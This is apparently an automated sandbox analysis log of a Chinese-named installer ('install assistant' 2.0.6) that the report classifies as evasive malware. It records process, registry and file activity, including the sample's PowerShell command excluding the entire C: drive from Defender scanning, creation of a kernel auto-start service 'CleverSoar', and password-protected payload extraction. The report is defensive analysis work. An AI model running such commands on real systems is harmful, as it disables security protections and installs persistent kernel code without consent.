Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B0BAC9	10_2_00B0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B0BC92	10_2_00B0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B77C50	10_2_00B77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B6FDF0	10_2_00B6FDF0

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: String function: 6CAF6F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: String function: 6CA59240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 00B8FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 00AF28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 00AF1E40 appears 171 times

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	Static PE information: Number of sections : 11 > 10

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007F23A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000000.2078119623.0000000000639000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.00000000034AE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe	Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tProtect.dll.12.dr	Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr	Binary string: \Device\TfKbMonPWLCache

Source: classification engine

Classification label: mal88.evad.winEXE@134/32@0/0

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	6_2_6CA25D60
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	10_2_00AF9313
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00B03D66

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00AF9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

10_2_00AF9252

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Code function: 6_2_6CA25240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,

6_2_6CA25240

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

File created: C:\Program Files (x86)\Windows NT\is-QJ471.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3056:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5780:120:WilError_03

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe

File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Virustotal: Detection: 6%

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe

File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
